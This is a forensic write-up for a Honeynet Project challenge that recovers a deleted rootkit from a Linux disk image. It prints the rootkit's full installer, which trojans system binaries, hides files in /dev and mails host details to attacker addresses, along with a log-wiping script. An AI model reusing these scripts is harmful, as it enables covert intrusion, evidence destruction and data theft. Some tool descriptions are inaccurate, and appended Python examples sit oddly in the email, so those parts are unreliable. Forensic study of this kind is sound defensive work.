From malmassari@hotmail.com Fri May 25 11:48:45 2001
Date: Fri, 25 May 2001 08:02:46
From: Majid Almassari
To: project@honeynet.org
Subject: Scan#15

The challenge:

1. Show step by step how you identify and recover the deleted root kit from the / partition.
2. Recover the root kit. Identify what files make up the deleted root kit.

Bonus Question: Was the root kit ever actually installed on the system? How do you know?

----------------------------------------------------------------

Recovery:

1. Download the compressed image of the root slice /. Verify the MD5 checksum. On my system I have GNU Privacy Guard (GPG) installed, which I'm going to use for MD5 verification:

    gpg --print-md md5 honeynet.tar.gz
    honeynet.tar.gz: 0D FF 8F B9 FE 02 2E A8 0D 8F 1A 4E 4A E3 3E 21

Which checks out with MD5=0dff8fb9fe022ea80d8f1a4e4ae33e21. This does not necessarily mean that the tarball is authentic; one can use tools such as "fix" to counterfeit the checksum. For our purpose we will go ahead and trust the results!

Untarring the file

    tar xzvf honeynet.tar.gz

and verifying the signature again we get

    gpg --print-md md5 honeypot.hda8.dd
    honeypot.hda8.dd: 5A 8E BF 57 25 B1 5E 56 3C 82 5B E8 5F 2F 85 2E

Which checks out with MD5=5a8ebf5725b15e563c825be85f2f852e. Note that I could have used another utility such as md5sum. Use man md5sum for more information.

Reading the Readme file, we have:
(1) The system is a Linux Red Hat 6.2.
(2) The root slice was included: /dev/hda8.

2. The image files can be mounted on Linux systems using the loopback interface like this:

    # mkdir /home/t
    # mount -o ro,loop,nodev,noexec honeypot.hda8.dd /home/t

Note that it is a good idea to mount read-only to preserve evidence, and noexec, nodev to avoid executing a binary in the mounted partition and to ignore any device node it might encounter.

3. Before starting to analyze any files, we need to establish our forensic tool kit.
One of the methods is to burn a CD-ROM copy of well-known source files of various file and network utilities such as netstat, lsof, ps, ls, su, gdb, passwd, netcat, strace/ltrace, who, finger, w, find and many others, including static system and shared libraries. This technique is essential and provides a base of trusted utilities when analyzing files on a system that has been compromised with a root kit. Since we are analyzing a backed-up bit "dd" image of the compromised root partition on a separate analysis system, this step is not required but recommended. I will go ahead and trust the binaries on the analysis system, and I'm going to use the following methods for analysis:

(1) Standard UNIX tools to perform the analysis. It's amazing how much info you can get out of the standard UNIX commands like strings and grep.
(2) The Coroner's Toolkit. I will use various utilities from TCT like icat, unrm and lazarus.

It is also recommended that we perform the analysis on a trusted system of a similar OS release; for this scan, the analysis system is a VA Linux box running Red Hat 6.2. Also I will be using the Coroner's Toolkit to perform forensic analysis.

Analyzing using standard UNIX tools:

1. I used script to record my bash shell terminal session and issued the following commands:
2. less /home/t/etc/fstab to get the file system structure.
3. ls -lat /home/t/home. Surprisingly there were no directories.
4. less /home/t/etc/passwd. Accounts looked normal but the account jjs:x:500:500:John J. Smith:/home/jss:/bin/bash has a home directory of /home/jss which is not apparent in step 3 above.
5. ls -lat /dev | head -50 gives a listing of suspicious files that start with - (normal files in a device directory! Hmm). The file names are last, rpm and MAKEDEV, with execute permissions, plus an ida and an rd directory.
6. less /home/t/dev/last gives:

    1 193.231.139
    1 213.154.137
    1 193.254.34
    3 48744
    3 3666
    3 31221
    3 22546
    4 48744
    4 2222

7. less /home/t/dev/rpm gives:

    3 sl2
    3 sshdu
    3 linsniffer
    3 smurf
    3 slice
    3 mech
    3 muh
    3 bnc
    3 psybnc

Interesting: sshdu is a trojaned ssh daemon, linsniffer is just a sniffer. smurf, slice, sl2 (Slice2) are DoS programs; bnc and psybnc are probably a trojaned version of the ps command, so watch for an executable named bnc or psybnc.

8. # strings /home/t/dev/MAKEDEV > strings.out
   less strings.out shows a long script that is part of a trojan rewriting the /proc and /dev file system.

9. Since we are working on a trusted analysis system, we can safely use commands such as find and grep. Nothing of interest was found; it looks like there were some files and/or folders deleted from the system, for example there is nothing in the home and usr/bin directories, even though the account jjs should have a home directory. This is where I'm going to use the Coroner's Toolkit. See the next section for details.

The Coroner's Toolkit (TCT):

1. Copied the password and group files to the main tct-1.6 directory for further analysis, and renamed the passwd and group files to victim.passwd and victim.group respectively.
2. Used grave-robber to collect lstat() results for mactime.
3. Used "ils" and "ils2mac" to get the MAC times of deleted i-nodes.
4. Combined the body of undeleted and deleted i-nodes and named it complete-body.
5. Ran mactime to get Modify/Access/Change (MAC) timestamp analysis.

----------------------------------------------------------------
# grave-robber -c /home/t -m -d data -o LINUX2
# ils /home/malmassari/HoneyNet/scan15/honeynet/honeypot.hda8.dd | ils2mac > body-deleted
# cat body body-deleted > body-full
# mactime -p victim.passwd -g victim.group -b body-full 3/14/2001 > mactime.txt
----------------------------------------------------------------

Now that we have the mactime.txt file we can grep for various keywords like rpm, sl2, linsniffer, smurf, slice, mesh, muh, bnc, psybnc, and jjs.
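To make the body-merge and mactime step concrete, here is an added example (my own code, not part of this write-up or of TCT) that merges a live body file with an ils2mac body file and renders the same m/a/c rows that mactime prints, mapping ids through the victim's passwd and group files. The 16-field body layout it parses and the sample rows are assumptions modelled on the entries above.

```python
"""Merge TCT body files and render a mactime-style MAC timeline.
Added example, not part of the original write-up or of TCT. Assumes the
classic 16-field grave-robber/ils2mac body layout (FIELDS, an assumption)
and mimics `mactime -p -g -b`: one row per (timestamp, file) flagged m/a/c,
with uid/gid mapped through the victim's own passwd and group files.
"""
from collections import defaultdict
from datetime import datetime, timezone

FIELDS = ("md5", "file", "dev", "inode", "mode", "ls", "nlink", "uid", "gid",
          "rdev", "size", "atime", "mtime", "ctime", "blksize", "blocks")

def parse_body(*texts):
    """Parse one or more body files (e.g. live inodes plus ils2mac output)."""
    rows = []
    for text in texts:
        for line in text.splitlines():
            line = line.strip()
            if not line or line.startswith("#"):
                continue
            parts = line.split("|")
            if len(parts) != len(FIELDS):
                raise ValueError("unexpected field count: %r" % line)
            rows.append(dict(zip(FIELDS, parts)))
    return rows

def load_ids(text):
    """Map numeric id -> name from a passwd or group file ('name:x:id:...')."""
    names = {}
    for line in text.splitlines():
        f = line.split(":")
        if len(f) >= 3 and f[2].isdigit():
            names[f[2]] = f[0]
    return names

def build_timeline(rows, since=0, users=None, groups=None):
    """Return sorted (epoch, flags, size, ls, user, group, path) tuples."""
    users, groups = users or {}, groups or {}
    events = defaultdict(set)            # (epoch, path) -> subset of {m,a,c}
    meta = {}
    for r in rows:
        meta[r["file"]] = r
        for flag, key in (("m", "mtime"), ("a", "atime"), ("c", "ctime")):
            t = int(r[key])
            if t >= since:               # mactime's start-date filter
                events[(t, r["file"])].add(flag)
    out = []
    for (t, path), flags in sorted(events.items()):
        r = meta[path]
        fl = "".join(f if f in flags else "." for f in "mac")
        out.append((t, fl, r["size"], r["ls"], users.get(r["uid"], r["uid"]),
                    groups.get(r["gid"], r["gid"]), path))
    return out

def render(timeline):
    """Format like mactime: the timestamp is printed only when it changes."""
    lines, last = [], None
    for t, fl, size, ls, user, group, path in timeline:
        stamp = datetime.fromtimestamp(t, timezone.utc).strftime("%b %d %y %H:%M:%S")
        lines.append("%s %8s %s %s %-8s %-8s %s" % (
            stamp if stamp != last else " " * len(stamp), size, fl, ls, user, group, path))
        last = stamp
    return "\n".join(lines)

# Constructed sample rows modelled on the /home/t/bin/rpm and /home/t/dev/rpm
# entries of the write-up; epochs are UTC for Mar 15 2001 03:18:15 and 03:18:16.
BODY_LIVE = "0|/home/t/bin/rpm|773|16083|33261|-rwxr-xr-x|1|0|0|0|886424|984626296|952000000|984626295|4096|1740\n"
BODY_DELETED = "0|/home/t/dev/rpm|773|30140|33188|-rw-r--r--|1|0|0|0|71|984626296|984626296|984626296|4096|2\n"
VICTIM_PASSWD = "root:x:0:0:root:/root:/bin/bash\njjs:x:500:500:John J. Smith:/home/jss:/bin/bash\n"
VICTIM_GROUP = "root:x:0:\ntty:x:5:\n"

def demo():
    """Timeline from Mar 15 2001 00:00 UTC (epoch 984614400) onward."""
    return build_timeline(parse_body(BODY_LIVE, BODY_DELETED), since=984614400,
                          users=load_ids(VICTIM_PASSWD), groups=load_ids(VICTIM_GROUP))
```

Running print(render(demo())) gives the three rows for the two rpm entries in the order mactime would list them, with the earlier mtime of /home/t/bin/rpm dropped by the start-date filter.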
Interesting results were obtained for sl2 and linsniffer in /home/t/dev/ida, which calls for further investigation.

----------------------------------------------------------------
# grep rpm mactime.txt
Mar 15 01 03:18:15   886424 ..c -rwxr-xr-x root     root     /home/t/bin/rpm
Mar 15 01 03:18:16     1024 ..c drwxr-xr-x root     root     /home/t/etc/rpm
                     886424 .a. -rwxr-xr-x root     root     /home/t/bin/rpm
                         71 mac -rw-r--r-- root     root     /home/t/dev/rpm
                       1024 .a. drwxr-xr-x root     root     /home/t/etc/rpm
# grep sl2 mactime.txt
                       8268 mac -rwx------ root     root     /home/t/dev/ida/.. /sl2
                       8268 mac -rwx------ root     root     /home/t/dev/ida/.drag-on/sl2A
# grep linsniffer mactime.txt
                       7165 mac -rwx------ root     root     /home/t/dev/ida/.. /linsniffer
                       7165 m.c -rwx------ root     root     /home/t/dev/ida/.drag-on/linsniffer
                       7165 .a. -rwx------ root     root     /home/t/dev/ida/.drag-on/linsniffer
# grep smurf mactime.txt
# grep slice mactime.txt
# grep mesh mactime.txt
# grep muh mactime.txt
# grep bnc mactime.txt
# grep psybnc mactime.txt
# grep jjs mactime.txt
Mar 15 01 09:31:40        0 ..c crw--w---- jjs      tty      /home/t/dev/vcs1
                          0 ..c crw--w---- jjs      tty      /home/t/dev/vcsa1
----------------------------------------------------------------

Doing an ls -lat on /home/t/dev/ida/.drag-on we get:

# ls -lat
total 660
-rw-r--r--   1 root     root          138 Mar 16 08:28 tcp.log
-rw-------   1 root     root          512 Mar 16 06:45 ssh_random_seed
drwxr-xr-x   2 root     root         1024 Mar 15 17:45 .
drwxrwxr-x   4 root     root        12288 Mar 15 17:45 ..
-rwx------   1 root     root         7165 Mar 15 17:45 linsniffer
-rwx------   1 root     root           75 Mar 15 17:45 logclear
-rwxr-xr-x   1 root     root       632066 Mar 15 17:45 mkxfs
-rw-r--r--   1 root     root          708 Mar 15 17:45 s
-rwxr-xr-x   1 root     root         4060 Mar 15 17:45 sense
-rwx------   1 root     root         8268 Mar 15 17:45 sl2
-rw-------   1 root     root          540 Mar 15 17:45 ssh_host_key

Interesting results are in tcp.log, which appears to be a linsniffer log file.
It also appears that an FTP connection from cr272065-a.wlfdle1.on.wave.home.com failed but a telnet connection from ns2.giant.net was successful. Also, the famous Linux sniffer was stopped by the kill command and then recreated:

----------------------------------------------------------------
# less tcp.log
cr272065-a.wlfdle1.on.wave.home.com => asdf1 [21]
----- [Timed Out]

ns2.giant.net => asdf1 [23]
da#da,~daO~daO~daU~ #'da[~dac~!dan~da~?

# less logclear
killall -9 linsniffer
rm -rf tcp.log
touch tcp.log
./linsniffer >tcp.log &
----------------------------------------------------------------

Issuing a strings command on mkxfs shows that it's just a trojaned version of sshd 1.2.27 trying to get installed. It also looks like they tried to generate their own public/private key pair. Interesting... I wonder what happens if the attacker had his hands on an existing public/private key pair? Trust relationship, here we come! I also wonder if the trojaned sshd does any logging, or if they got a patch for the trojan to accept magic passwords and not log? ;-) A snippet from the strings output is shown below.

----------------------------------------------------------------
/etc/sshd_config
Received SIGHUP; restarting.
RESTART FAILED: av[0]='%.100s', error: %.100s.
Received signal %d; terminating.
Timeout before authentication.
Generating new %d bit RSA key.
RSA key generation complete.
f:p:b:k:h:g:diqV:
i686-unknown-linux
1.2.27
sshd version %s [%s]
Usage: %s [options]
Options:
/etc
  -f file    Configuration file (default %s/sshd_config)
  -d         Debugging mode
  -i         Started from inetd
  -q         Quiet (no logging)
  -p port    Listen on the specified port (default: 22)
  -k seconds Regenerate server key every this many seconds (default: 3600)
  -g seconds Grace period for authentication (default: 300)
  -b bits    Size of server RSA key (default: 768 bits)
/etc/ssh_host_key
.......
----------------------------------------------------------------

The "s" file is just the trojaned sshd_config file; the interesting part is that it listens on port 5. The strings output of the sense file indicates that it sorts the output from LinSniffer 0.03 b[BETA] by Mike Edulla. At the moment I cannot make out the strings output for sl2; it looks like the compilation core dumped. This is interesting, so keep it in mind, because that might indicate that the root kit was not installed successfully. The strings output of ssh_host_key shows that it's a private key belonging to root@dil2.datainfosys.net.

----------------------------------------------------------------
SSH PRIVATE KEY FILE FORMAT 1.1
RLU(
root@dil2.datainfosys.neth_h_
0lj0
----------------------------------------------------------------

The following files were recovered using icat:

# icat /home/malmassari/HoneyNet/scan15/honeynet/honeypot.hda8.dd 16110 > icat-16110
# file icat-16110
icat-16110: ASCII text
# cat icat-16110
#%PAM-1.0
auth       required     /lib/security/pam_pwdb.so shadow nullok
account    required     /lib/security/pam_pwdb.so
password   required     /lib/security/pam_cracklib.so retry=3
password   required     /lib/security/pam_pwdb.so use_authtok nullok
----------------------------------------------------------------
# icat /home/malmassari/HoneyNet/scan15/honeynet/honeypot.hda8.dd 30188 > icat-30188
# file icat-30188
icat-30188: ELF 32-bit LSB executable, Intel 80386, version 1, dynamically linked (uses shared libs), stripped
# strings icat-30188 > icat-30188-strings.out    <--- Trojaned netstat 1.38, see below
+NEW_ADDRT +RTF_IRTT +RTF_REJECT +FW_MASQUERADE +I18N
AF: (inet) +UNIX +INET +INET6 +IPX +AX25 +NETROM +ATALK +ECONET +ROSE
HW: +ETHER +ARC +SLIP +PPP +TUNNEL +TR +AX25 +NETROM +FR +ROSE +ASH +SIT +FDDI +HIPPI +HDLC/LAPB
net-tools 1.54
netstat 1.38 (1999-04-20)
Fred Baumgarten, Alan Cox, Bernd Eckenfels, Phil Blundell, Tuan Hoang and others
/proc
/proc/%s/fd
socket:[
cmdline
%s/%s
(No info could be read for "-p": geteuid()=%d but you should be root.)
(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)
ESTABLISHED
DISC SENT
CONN SENT
LISTENING
/proc/net/nr
AF NETROM
netstat %s: no support for `%s' on this system.
Active NET/ROM sockets
User       Dest       Source     Device  State        Vr/Vs    Send-Q Recv-Q
%s %*x/%*x %*x/%*x %d %d %d %*d %*d/%*d %*d/%*d %*d/%*d %*d/%*d %*d/%*d %*d %d %d %*d
Problem reading data from %s
%-9s %-9s %-9s %-6s %-11s %03d/%03d %-6d %-6d
CLOSING
----------------------------------------------------------------
# icat /home/malmassari/HoneyNet/scan15/honeynet/honeypot.hda8.dd 30191 > icat-30191
# file icat-30191
icat-30191: ELF 32-bit LSB executable, Intel 80386, version 1, dynamically linked (uses shared libs), stripped
# strings icat-30191 > icat-30191-strings.out    <--- Possible trojaned "ps" since it uses libproc.so.2.0.6. See below for a strings snippet
/lib/ld-linux.so.2
__gmon_start__
libproc.so.2.0.6
dev_to_tty
procps_version
Hertz
_DYNAMIC
ps_readproc
reset_sort_options
read_total_main
open_psdb
_init
display_version
openproc
look_up_our_self
linux_version_code
closeproc
uptime
_fini
wchan
_GLOBAL_OFFSET_TABLE_
libc.so.6
----------------------------------------------------------------
# icat /home/malmassari/HoneyNet/scan15/honeynet/honeypot.hda8.dd 2039 > icat-2039
# file icat-2039
icat-2039: ELF 32-bit LSB executable, Intel 80386, version 1, dynamically linked (uses shared libs), not stripped
# strings icat-2039 > icat-2039-strings.out    <--- looks like the sshd installation script
/lib/ld-linux.so.2
__gmon_start__
libnsl.so.1
libcrypt.so.1
libutil.so.1
libc.so.6
.............
/usr/bin/rsh
/rlogin
You don't exist, go away!
ssh1
slogin1
ssh.old
slogin.old
ssh1.old
slogin1.old
remsh
eilcpLRo
Warning: Identity file %s does not exist.
...............
----------------------------------------------------------------

You can do this with each dead file listed in mactime.txt; instead I will use the disk data recovery tool that comes with TCT, namely the unrm utility. First you want to determine the disk space needed for the output. Using the df command on the mounted partition shows what we need:

# df /home/t
Filesystem                                                  1k-blocks    Used Available Use% Mounted on
/home/malmassari/HoneyNet/scan15/honeynet/honeypot.hda8.dd     256667   32498    210917  13% /home/t

Therefore we need about 210 MB of free disk space. This should not be a problem since we are analyzing this on a 30 GB drive.

# unrm /home/malmassari/HoneyNet/scan15/honeynet/honeypot.hda8.dd > victim.hda8.unrm

It took about 2-3 minutes until the output was generated. It was about a 230 MB binary file. Now I will feed the result to lazarus with -h to generate HTML output:

# lazarus -h victim.hda8.unrm

The process lasted for about 20 minutes; two subdirectories were created, "blocks" and "www". Opening victim.hda8.unrm.frame.html with a browser, we can see a hyperlinked output of lazarus with the top frame showing the file type designation in a colour code.
Browsing through the output files, I found a couple of interesting files:

----------------------------------------------------------------
8499.frame.html: This looks like the root kit installation script, see below
----------------------------------------------------------------
#!/bin/sh
clear
unset HISTFILE
echo "********* Instalarea Rootkitului A Pornit La Drum *********"
echo "********* Mircea SUGI PULA ********************************"
echo "********* Multumiri La Toti Care M-Au Ajutat **************"
echo "********* Lemme Give You A Tip : **************************"
echo "********* Ignore everything, call your freedom ************"
echo "********* Scream & swear as much as you can ***************"
echo "********* Cuz anyway nobody will hear you and no one will *"
echo "********* Care about you **********************************"
echo
echo
chown root.root *
if [ -f /usr/bin/make ]; then
  echo "Are Make !"
else
  echo "Nu Are Make !"
fi
if [ -f /usr/bin/gcc ]; then
  echo "Are Gcc !"
else
  echo "Nu Are Gcc !"
fi
if [ -f /usr/sbin/sshd/ ]; then
  echo "Are Ssh !"
else
  echo "Nu Are Ssh !"
fi
echo -n "* Inlocuim nestat ... alea alea "
rm -rf /sbin/ifconfig
mv ifconfig /sbin/ifconfig
rm -rf /bin/netstat
mv netstat /bin/netstat
rm -rf /bin/ps
mv ps /bin/ps
rm -rf /usr/bin/top
mv top /usr/bin/top
cp -f mkxfs /usr/sbin/
echo "* Gata..."
echo -n "* Dev... "
echo
echo
touch /dev/rpm >/dev/rpm
echo "3 sl2" >>/dev/rpm
echo "3 sshdu" >>/dev/rpm
echo "3 linsniffer" >>/dev/rpm
echo "3 smurf" >>/dev/rpm
echo "3 slice" >>/dev/rpm
echo "3 mech" >>/dev/rpm
echo "3 muh" >>/dev/rpm
echo "3 bnc" >>/dev/rpm
echo "3 psybnc" >> /dev/rpm
touch /dev/last >/dev/last
echo "1 193.231.139" >>/dev/last
echo "1 213.154.137" >>/dev/last
echo "1 193.254.34" >>/dev/last
echo "3 48744" >>/dev/last
echo "3 3666" >>/dev/last
echo "3 31221" >>/dev/last
echo "3 22546" >>/dev/last
echo "4 48744" >>/dev/last
echo "4 2222" >>/dev/last
echo "* Gata"
echo "* Facem Director...Si Mutam Alea.. "
mkdir -p /dev/ida/.drag-on
mkdir -p /dev/ida/".. "
echo "* Copiem ssh si alea"
cp linsniffer logclear sense sl2 mkxfs s ssh_host_key ssh_random_seed /dev/ida/.drag-on/
cp linsniffer logclear sense sl2 mkxfs s ssh_host_key ssh_random_seed /dev/ida/".. "
rm -rf linsniffer logclear sense sl2 mkxfs s ssh_host_key ssh_random_seed
touch /dev/ida/.drag-on/tcp.log
touch /dev/ida/".. "/tcp.log
cp -f inetd.conf /etc
cp -f services /etc
killall -HUP inetd
echo
echo
echo
echo "* Adaugam In Startup:) ..."
rm -rf /usr/bin/lsattr
echo "/usr/bin/lsattr -t1 -X53 -p" >> /etc/rc.d/rc.sysinit
echo >> /etc/rc.d/rc.sysinit
cp -f lsattr /usr/bin/
chmod 500 /usr/bin/lsattr
chattr +i /usr/bin/lsattr
/usr/bin/lsattr
sleep 1
if [ -d /home/httpd/cgi-bin ]
then
  mv -f last.cgi /home/httpd/cgi-bin/
fi
if [ -d /usr/local/httpd/cgi-bin ]
then
  mv -f last.cgi /usr/local/httpd/cgi-bin/
fi
if [ -d /usr/local/apache/cgi-bin ]
then
  mv -f last.cgi /usr/local/apache/cgi-bin/
fi
if [ -d /www/httpd/cgi-bin ]
then
  mv -f last.cgi /www/httpd/cgi-bin/
fi
if [ -d /www/cgi-bin ]
then
  mv -f last.cgi /www/cgi-bin/
fi
echo "* Luam Informatiile dorite ..."
echo "* Info : $(uname -a)" >> computer
echo "* Hostname : $(hostname -f)" >> computer
echo "* IfConfig : $(/sbin/ifconfig | grep inet)" >> computer
echo "* Uptime : $(uptime)" >> computer
echo "* Cpu Vendor ID : $(cat /proc/cpuinfo|grep vendor_id)" >> computer
echo "* Cpu Model : $(cat /proc/cpuinfo|grep model)" >> computer
echo "* Cpu Speed: $(cat /proc/cpuinfo|grep MHz)" >> computer
echo "* Bogomips: $(cat /proc/cpuinfo|grep bogomips)" >> computer
echo "* Spatiu Liber: $(df -h)" >> computer
echo "* Gata ! Trimitem Mailul ...Asteapta Te Rog "
cat computer | mail -s "placinte" last@linuxmail.org
cat computer | mail -s "roote" bidi_damm@yahoo.com
echo "* Am trimis mailul ... stergem fisierele care nu mai trebuie ."
echo
echo
echo "* G A T A *"
echo
echo "* That Was Nice Last "
cd /
rm -rf last lk.tgz computer lk.tar.gz
----------------------------------------------------------------

The 8510.frame.html file is basically sauber by socked, which is part of the t0rn kit, namely t0rnsb. Sauber is a German word which means clean; it cleans syslog files, then restarts syslogd. See below:

#!/bin/bash
#
# sauber - by socked [11.02.99]
#
# Usage: sauber
BLK='#[1;30m'
RED='#[1;31m'
GRN='#[1;32m'
YEL='#[1;33m'
BLU='#[1;34m'
MAG='#[1;35m'
CYN='#[1;36m'
WHI='#[1;37m'
DRED='#[0;31m'
DGRN='#[0;32m'
DYEL='#[0;33m'
DBLU='#[0;34m'
DMAG='#[0;35m'
DCYN='#[0;36m'
DWHI='#[0;37m'
RES='#[0m'
echo "${BLK}* ${WHI}sauber ${DWHI}by ${WHI}s${BLU}o${DBLU}ck${BLK}ed [${DWHI}07${BLK}.${DWHI}27${BLK}.${DWHI}97${BLK}]${RES}"
if [ $# != 1 ]
then
  echo "${BLK}* ${DWHI}Usage${WHI}: "`basename $0`" <${DWHI}string${WHI}>${RES}"
  echo " "
  exit
fi
echo "${BLK}*${RES}"
echo "${BLK}* ${DWHI}Cleaning logs.. This may take a bit depending on the size of the logs.${RES}"
WERD=$(/bin/ls -F /var/log | grep -v "/" | grep -v "*" | grep -v ".tgz" | grep -v ".gz" | grep -v ".tar" | grep -v "lastlog" | grep -v "utmp" | grep -v "wtmp" | grep -v "@")
for fil in $WERD
do
  line=$(wc -l /var/log/$fil | awk -F ' ' '{print $1}')
  echo -n "${BLK}* ${DWHI}Cleaning ${WHI}$fil ($line ${DWHI}lines${WHI})${BLK}...${RES}"
  grep -v $1 /var/log/$fil > new
  touch -r /var/log/$fil new
  mv -f new /var/log/$fil
  newline=$(wc -l /var/log/$fil | awk -F ' ' '{print $1}')
  let linedel=$(($line-$newline))
  echo "${WHI}$linedel ${DWHI}lines removed!${RES}"
done
killall -HUP syslogd
echo "${BLK}* ${DWHI}Alles sauber mein Meister !'Q%&@$! ${RES}"
stream tcp nowait cyrus /usr/cyrus/bin/pop3d pop3d
---------------------------------------------------------------

8517.frame.html is a deleted /etc/services file.
8529.frame.html is a Perl script that sorts linsniff output.
84383.frame.html is an email generated from the root kit installation script.
It sends system info to last@linuxmail.org. See below:

To: last@linuxmail.org
Subject: placinte

* Info : Linux asdf1 2.2.14-5.0 #1 Tue Mar 7 20:53:41 EST 2000 i586 unknown
* Hostname : asdf1
* IfConfig : inet addr:127.0.0.1 Bcast:127.255.255.255 Mask:255.0.0.0
             inet addr:172.16.1.108 Bcast:172.16.1.255 Mask:255.255.255.0
* Uptime : 7:45pm up 8:23, 0 users, load average: 0.00, 0.00, 0.00
* Cpu Vendor ID : vendor_id : GenuineIntel
* Cpu Model : model : 4
              model name : Pentium MMX
* Cpu Speed: cpu MHz : 200.457171
* Bogomips: bogomips : 399.77
* Spatiu Liber: Filesystem   Size  Used Avail Use% Mounted on
                /dev/hda8    251M   33M  205M  14% /
                /dev/hda1     23M  2.4M   19M  11% /boot
                /dev/hda6    1.6G  2.1M  1.5G   0% /home
                /dev/hda5    1.6G  367M  1.2G  23% /usr
                /dev/hda7    251M  5.3M  232M   2% /var
----------------------------------------------------------------

100152.frame.html is a deleted /etc/nsswitch.conf.
100159.frame.html is a deleted /etc/group.
100169.frame.html is a deleted /etc/passwd.
100219.frame.html is a deleted /etc/inittab.
100265.frame.html is a deleted /etc/syslogd.conf.

Now it is time to recover the deleted binaries, starting with ifconfig:

# grep -il ifconfig blocks/* > ifconfig-match
# cat ifconfig-match
blocks/165802.strings
blocks/165802.x.txt
blocks/385.x.txt
blocks/84383.m.txt
blocks/8499.p.txt

The 165802.strings file is just the strings output from when I was investigating the file; this file looks like the original deleted ifconfig.
Similarly,

# grep -il netstat blocks/* > netstat-match
# cat netstat-match
blocks/114990.t.txt
blocks/114991...txt
blocks/114993.t.txt
blocks/114994...txt
blocks/115001.t.txt
blocks/165802.strings
blocks/165802.x.txt
blocks/30039.t.txt
blocks/385.strings
blocks/385.x.txt
blocks/8043...txt
blocks/8394.t.txt
blocks/8499.p.txt
blocks/8510.t.txt
blocks/8517.t.txt
blocks/8767...txt
blocks/9020.strings
blocks/9020.x.txt

This is obviously a lot of files to go through; instead we can look at the original strings output of netstat and grep for a version string it uses, like this:

# strings /bin/netstat > netstat-orig-strings
# less netstat-orig-strings
.....
netstat 1.38 (1999-04-20)
.....

Therefore grepping through the blocks folder yields the following:

# grep -il "netstat 1.38 (1999-04-20)" blocks/* > netstat-match
# cat netstat-match
blocks/114990.strings
blocks/114990.t.txt
blocks/netstat-orig-strings

Therefore 114990.t.txt represents the deleted netstat. Similarly for the other files.

----------------------------------------------------------------

The root kit consists of the following trojaned files: ifconfig, netstat, ps, top, mkxfs, lsattr. In addition, the following names were installed in /home/t/dev/rpm: sl2 sshdu linsniffer smurf slice mech muh bnc psybnc. The following files were installed in /dev/ida/.drag-on and /dev/ida/".. ": linsniffer logclear sense sl2 mkxfs s ssh_host_key ssh_random_seed. This root kit is very similar to the t0rn kit, which has binaries compiled with libc5 and does not work properly under Red Hat 6.2.

----------------------------------------------------------------

Bonus Question: The root kit was indeed installed on the system. First, there was that deleted mail shown above confirming the root kit installation. Secondly, there is a tcp.log which shows linsniff activity output.

----------------------------------------------------------------
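As an added defender's check (my own code, not part of this write-up), the following script encodes the /dev indicators established above, regular files planted in /dev, dot-prefixed and dot/space-only names under /dev, and the kit file names, so they can be run against a read-only mounted image. The mount point /home/t and the names come from this analysis; the rule set itself is an assumption of mine.

```python
"""Flag the /dev abuse this root kit relies on, in a mounted image.

Added example, not part of the original write-up. It turns the indicators
established above into a check: regular files planted in /dev (last, rpm),
dot-prefixed or dot/space-only names under /dev (/dev/ida/.drag-on,
/dev/ida/".. "), and the kit file names copied there. The mount point
/home/t and the names come from the write-up; the rules are my own.
"""
import os
import stat

# names the install script copies into /dev/ida/.drag-on and /dev/ida/".. "
KIT_FILES = {"linsniffer", "logclear", "sense", "sl2", "mkxfs", "s",
             "ssh_host_key", "ssh_random_seed", "tcp.log"}

def classify(rel_path, is_regular):
    """Findings for one entry given its path relative to the image root
    (e.g. 'dev/rpm'); an empty list means nothing looked wrong."""
    findings = []
    parts = rel_path.split("/")
    if parts[0] != "dev" or len(parts) < 2:
        return findings
    name = parts[-1]
    if name.startswith("."):
        if set(name) <= set(". "):
            findings.append("dot/space-only name under /dev")
        else:
            findings.append("dot-prefixed entry under /dev")
    if is_regular:
        # /dev should hold device nodes; a regular file here was planted
        findings.append("regular file in /dev")
        if name in KIT_FILES:
            findings.append("known kit file name")
    return findings

def scan_records(records):
    """records: iterable of (rel_path, is_regular); returns a dict
    rel_path -> findings for every entry that produced at least one."""
    hits = {}
    for rel_path, is_regular in records:
        found = classify(rel_path, is_regular)
        if found:
            hits[rel_path] = found
    return hits

def walk_image(root):
    """Yield (rel_path, is_regular) for everything under root/dev, using
    lstat so symlinks are never followed into the analysis host."""
    for dirpath, dirnames, filenames in os.walk(os.path.join(root, "dev")):
        for n in dirnames + filenames:
            full = os.path.join(dirpath, n)
            st = os.lstat(full)
            yield os.path.relpath(full, root), stat.S_ISREG(st.st_mode)

if __name__ == "__main__":
    for path, why in sorted(scan_records(walk_image("/home/t")).items()):
        print("%-40s %s" % (path, "; ".join(why)))
```

MAKEDEV is a legitimate regular file in /dev on this release, so it will be flagged too; on this image that is the right outcome, since the write-up found it rewritten.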